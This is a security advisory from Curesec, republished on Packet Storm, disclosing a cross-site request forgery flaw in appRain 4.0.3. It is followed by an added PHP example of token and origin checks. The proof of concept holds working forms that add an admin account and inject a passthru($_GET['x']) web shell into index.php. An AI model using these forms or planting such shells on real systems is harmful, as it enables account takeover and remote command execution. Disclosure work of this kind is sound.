
appRain 4.0.3 Cross Site Request Forgery

10 Dec 2015 | Reported by Tim Coen | Type: packetstorm | Source: packetstormsecurity.com

appRain 4.0.3 CSRF Vulnerability in Data Exchange Securit

Code
`Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: appRain 4.0.3  
Fixed in: Fixed via Optional Module  
CSRF Protection Module Link: http://www.apprain.com/extension/20/accounting-system?s=Description  
Vendor Website: [email protected]  
Vulnerability Type: CSRF  
Remote Exploitable: Yes  
Reported to vendor: 10/02/2015  
Disclosed to public: 12/02/2015  
Release mode: Coordinated release  
CVE: requested, but not assigned  
Credits: Tim Coen of Curesec GmbH  
  
2. Vulnerability Description  
  
CVSS  
  
Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P  
  
Description  
  
None of the requests have CSRF protection. This means that an attacker can  
execute actions for an admin if the admin visits an attacker controlled website  
while logged in.  
  
3. Proof of Concept  
  
  
Add new Admin:  
  
<html>  
<body>  
<form action="http://localhost/apprain-source-4.0.3/admin/manage/add/" method="POST">  
<input type="hidden" name="data[Admin][f_name]" value="foo" />  
<input type="hidden" name="data[Admin][l_name]" value="foo" />  
<input type="hidden" name="data[Admin][email]" value="[email protected]" />  
<input type="hidden" name="data[Admin][username]" value="foo" />  
<input type="hidden" name="data[Admin][password]" value="fdnki2@#E@Kkfod" />  
<input type="hidden" name="data[Admin][status]" value="Active" />  
<input type="hidden" name="data[Admin][description]" value="foo" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
Code Execution (using the PHP file editor):  
  
<html>  
<body>  
<form action="http://localhost/apprain-source-4.0.3/appeditor/index?loc=webroot/index.php" method="POST">  
<input type="hidden" name="content" value="<?php  
/**  
* ---  
* appRain CMF  
*  
* LICENSE  
*  
* This source file is subject to the MIT license that is bundled  
* with this package in the file LICENSE.txt.  
* It is also available through the world-wide-web at this URL:  
* http://www.opensource.org/licenses/mit-license.php  
* If you did not receive a copy of the license and are unable to  
* obtain it through the world-wide-web, please send an email  
* to [email protected] so we can send you a copy immediately.  
*  
* @copyright Copyright (c) 2010 appRain, Team. (http://www.apprain.com)  
* @license http://www.opensource.org/licenses/mit-license.php MIT license  
*  
* HELP  
*  
* Official Website  
* http://www.apprain.com/  
*  
* Download Link  
* http://www.apprain.com/download  
*  
* Documents Link  
* http ://www.apprain.com/docs  
*/  
  
if (version_compare(phpversion(), '5.1.0', '<') === true) {  
die("<strong>Whoops, it looks like you have an invalid PHP version.</strong><br /><span>appRain supports PHP 5.1.0 or newer.</span>");  
}  
  
$appLoc = "../app.php";  
  
if (!file_exists($appLoc)) {  
die("appRain core file(s) missing... Get a new copy ");  
}  
  
error_reporting(E_ALL);  
  
require_once $appLoc;  
  
umask(0);  
  
App::Run();  
  
passthru($_GET['x']);" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
The injected code can now be executed here:  
http://localhost/apprain-source-4.0.3/webroot/index.php?x=ls  
  
4. Solution  
  
To mitigate this issue please install the "Data Exchange Security" module:  
  
http://www.apprain.com/extension/20/accounting-system?s=Description  
  
5. Report Timeline  
  
10/02/2015 Informed Vendor. Mailbox [email protected] is full, used [email protected] instead (no reply)  
10/21/2015 Reminded Vendor of Disclosure Date  
10/21/2015 Vendor announces fix  
~11/02/2015 Vendor releases optional module for CSRF protection  
11/04/2015 Suggested to vendor that CSRF protection should not be optional (no reply)  
11/17/2015 CVE Requested (no reply)  
12/02/2015 Disclosed to public  
  
  
Blog Reference:  
https://blog.curesec.com/article/blog/appRain-403-CSRF-112.html  
  
--  
blog: https://blog.curesec.com  
tweet: https://twitter.com/curesec  
  
Curesec GmbH  
Curesec Research Team  
Romain-Rolland-Str 14-24  
13089 Berlin, Germany  
  
  
`
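
One way to enforce the check the advisory reports as missing, shown as an added example (not code from appRain, its "Data Exchange Security" module, or the Curesec advisory): a per-session token plus an Origin/Referer check applied to every state-changing request, which would cover both the `admin/manage/add/` and `appeditor/index` forms in the proof of concept. The function names, the `csrf_token` field name and the `https://cms.example` origin are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers, not appRain functions. Requires PHP 7.3+.

/** Return the per-session token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** True when Origin (or, failing that, Referer) names this site's own origin. */
function csrf_same_origin(array $server, string $expectedOrigin): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $p = parse_url($source);
    if (!is_array($p) || !isset($p['scheme'], $p['host'])) {
        return false; // header missing, "null" or unparsable: reject
    }
    $origin = strtolower($p['scheme'] . '://' . $p['host'])
            . (isset($p['port']) ? ':' . $p['port'] : '');
    return hash_equals(strtolower($expectedOrigin), $origin);
}

/** Decide whether a request is allowed to change state. */
function csrf_request_allowed(array $server, array $post, array &$session, string $expectedOrigin): bool
{
    $method = strtoupper($server['REQUEST_METHOD'] ?? 'GET');
    if (in_array($method, ['GET', 'HEAD', 'OPTIONS'], true)) {
        return true; // safe methods; handlers must not change state on them
    }
    $sent = $post['csrf_token'] ?? '';
    return is_string($sent) && $sent !== ''
        && !empty($session['csrf_token'])
        && hash_equals($session['csrf_token'], $sent)   // constant-time compare
        && csrf_same_origin($server, $expectedOrigin);
}

// Assumed wiring in a front controller, before any admin action is dispatched.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();
if (!csrf_request_allowed($_SERVER, $_POST, $_SESSION, 'https://cms.example')) {
    http_response_code(403);
    exit('CSRF check failed');
}
```

Every admin form then has to carry the token as a hidden `csrf_token` field whose value comes from `csrf_token($_SESSION)`; a cross-site form like the ones in the proof of concept cannot read that value and is rejected with 403.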
